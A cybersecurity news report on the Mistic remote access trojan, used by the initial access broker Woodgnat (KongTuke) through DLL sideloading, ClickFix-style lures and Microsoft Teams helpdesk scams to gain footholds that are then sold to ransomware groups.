An emerging threat has surfaced in the cybersecurity landscape with the introduction of a new remote access trojan (RAT) known as Mistic. This malware is being leveraged by an initial access broker (IAB) linked to several ransomware groups, as reported by the cybersecurity teams at Broadcom’s Symantec and Carbon Black.
Woodgnat’s Expanding Threat Network
Operating under the identifiers Woodgnat and KongTuke, the threat actor has been active since at least May 2024. Their operations are closely associated with notorious ransomware groups, such as Qilin, Interlock, and Black Basta. Since April 2026, Woodgnat has been deploying the Mistic RAT to infiltrate networks across various sectors, including education, insurance, and IT services.
Prior to adopting Mistic, Woodgnat was known for using ModeloRAT in its cyber attacks. Their strategy involves casting a wide net to identify potential targets that can be sold to ransomware groups rather than focusing on a specific industry.
Capabilities and Deployment of Mistic RAT
Mistic, also referred to as MLTBackdoor, offers cybercriminals a suite of capabilities such as file manipulation, folder creation, and code execution. Additionally, it allows attackers to adjust the frequency of command retrieval and self-termination commands, enhancing their control over compromised systems.
The deployment of Mistic occurs through a DLL sideloading technique, often accompanied by credential-stealing tools. Other tools observed in these intrusions include Curl, PowerShell, and Windows Management Instrumentation (WMIC) for data exfiltration and reconnaissance.
Social Engineering and Distribution Tactics
Woodgnat’s distribution methods involve exploiting compromised WordPress sites and using social engineering tactics to lure targets into executing malicious commands. Techniques like ClickFix and FileFix are commonly employed to achieve this. Victims are often deceived into executing harmful PowerShell commands, which allows the attackers to assess the potential value of the compromised systems.
In addition to these methods, since April 2026, the threat actor has used IT-support scams and helpdesk masquerades via Microsoft Teams to trick users into running malicious code. This tactic further underscores the evolving nature of cyber threats and the importance of robust cybersecurity measures.
As cyber threats continue to advance, understanding the mechanisms and strategies employed by groups like Woodgnat is crucial for organizations aiming to protect their networks against such sophisticated attacks.
